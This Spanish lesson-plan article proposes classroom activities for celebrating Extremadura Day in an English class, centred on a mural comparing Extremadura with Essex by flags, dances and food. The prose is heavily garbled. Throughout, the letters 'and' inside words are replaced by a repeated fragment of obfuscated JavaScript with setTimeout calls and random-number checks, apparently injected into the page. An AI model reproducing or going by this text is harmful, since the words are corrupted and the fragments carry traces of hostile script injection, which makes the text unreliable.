¿CÓMO CELEBRAR EL DÍA DEL ESTATUTO DE EXTREMADURA EN EL AULA DE INGLÉS?

Autora: María Benítez Sanz

          Como todos sabemos, todos los años por el mes de febrero se celebra el día de Estatuto de Extremadura. En este día, en los colegios suelen tener lugar celebraciones  y actividades relacionadas con nuestra comunidad como bailes regionales, teatros, se canta el himno de Extremadura, se hacen bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderas, etc. Pero ¿es posible celebrar este día en el aula de inglés? A través de este artículo veremos algunas de las actividades que podemos realizar para integrar el conocimiento de la realidad extremeña en el aula de idiomas.


 

Primera actividad: INTRODUCCIÓN DE CONCEPTOS

          La primera actividad que realizaremos será familiarizar a nuestros alumnos con los conceptos de bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andera, himno, folclore, comunidad, país, región y tradiciones. Así enseñaremos a nuestros alumnos estos conceptos en inglés correspondientes a estos términos: flag, anthem, folklore, community, region, country or traditions. Para ello, dividiremos a los alumnos en grupos de cuatro y entregaremos a cada uno de ellos un diccionario de inglés. Uno de ellos se encargará de buscar las palabras correspondientes a estos términos en inglés mientras los demás anotan en un pequeño cuaderno su equivalencia al inglés, por ejemplo: bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andera=flag.


 

Segunda actividad: COMPARACIÓN DE ELEMENTOS CULTURALES

          Con esta segunda actividad, pretenderemos realizar un mini-proyecto en grupo, donde los alumnos tendrán que buscar información en internet y otros recursos como enciclopedias, para hacer una comparación entre la comunidad extremeña y alguna región de Inglaterra por ejemplo.

          Como sabemos, Inglaterra es un país dentro de Gran Bretaña que está dividido en condados y no en comunidades como ocurre en España. Así, nuestros alumnos deberán aprender a apreciar estas diferencias comparandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando los siguientes conceptos por ejemplo la comunidad de Extremadura dentro de España con el condado de Essex en Inglaterra.

          Para ello, la actividad propuesta, consistirá en que nuestros alumnos elaboren por grupos de cuatro un mural dividido en dos partes, donde ilustrarán y escribirán las diferencias culturales entre estas dos regiones. De esta forma los elementos que podrán incluir en el mural, serán los siguientes:

          Nuestros alumnos aprenderán a comparar los siguientes conceptos:

Bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderas:

Extremadura

Essex


Escudos

Extremadura

Essex

 

Bailes tradicionales

               A la hora de comparar bailes tradicionales podemos hacerlo mediante  las similitudes y las diferencias en el folclore de nuestra comunidad autónoma y nuestro baile regional como es la “jota extremeña”, con las características de uno de los bailes más típicos de Essex, como es la danza Morris. Comparandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando estos dos bailes nuestros alumnos podrán pegar fotos en el mural y escribirán las características que las diferencian. Un buen ejemplo sería el siguiente:

LA JOTA EXTREMEÑA:


Origen: Extremadura

Instrumentos utilizados: gaitas, guitarras, laúdes, castañuelas, pandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderetas, tambores y bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andurrias.

Trajes: faldas, refajo, faltriquera, mantones, pañuelos, medias, chalecos, etc.

Curiosidades: El contenido de las canciones es muy diverso, desde el patriotismo, hasta la religión o las picardías sexuales.


 

LA DANZA MORRIS DE ESSEX

Origen: Essex ( Inglaterra)

Instrumentos utilizados: palos, espadas, paillos y pañuelos.

Trajes: tirantes, gorro, pantalones, medias. 

Curiosidades: formaba parte d procesiones y otras fiestas celebradas en el mes de mayo.

          El último elemento cultural que podemos comparar se refiere a la GASTRONOMÍA: En el mismo mural podemos comparar las dos regiones y sus platos típicos por ejemplo con los siguientes datos:

          En Extremadura, los platos típicos de esta tierra son: el gazpacho extremeño, zarangollo, cocido extremeño, lentejas estofadas, sopa de perdices, arroz con conejo, migas extremeñas, caracoles y el lagarto. También el cordero asado, en caldereta, setas variadas, criadillas de tierra o espárragos trigueros. Otro producto típico de Extremadura es la Torta del Casar, además de los quesos quesos de La Serena, Ibores, Gata y como no el jamón de las dehesas extremeñas así como la miel  de tomillo, de brezo, de romero, de espliego, de tilo o de eucaliptos. 

 Torta del Casar

          En cuanto a la gastronomía de Essex, podemos destacar: Las empandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andas de carne y verdura, el Roast Beef o ternera asada, que es considerado como plato nacional, los mejillones avinagrados, la tarta de anguila, el cordero en salsa de menta.  También destaca, la tostada con judías, el queso fundido sobre una tostada o el bacon. En cuanto a los postres destaca el pastel de manzana o Apple Pie o los muffins de plátano con canela que son como una especie de magdalenas.


 

Ternera asada or Roast beef

          Como hemos visto, con esta actividad de comparación entre culturas, nuestros alumnos no solo conocerán más acerca de su comunidad, sino también aprenderán conceptos de la lengua extranjera al mismo tiempo que amplían su conocimiento sociocultural sobre los países de habla inglesa. Ésta es una buena actividad no sólo para el área de Inglés sino también para trabajar la competencia sociocultural que tiene tanta importancia en nuestro curriculum, sobre todo en lo que ser refiere al área de lenguas extranjeras para alcanzar una completa competencia comunicativa en nuestros alumnos.


 

BIBLIOGRAFÍA:

  • Real Decreto 1513/2006, de 7 Diciembre, por el que se establecen las enseñanzas mínimas de la Educación Primaria, BOE, número 293 de 8/12/2006, páginas 43053 a 43102.
  • Ellis andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Brewster, The Primary English Teacher´s Guide, published by Penguin, 2002.
  • Gran Enciclopedia Extremeña. Ediciones Edex, S.A. Mérida 1989.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.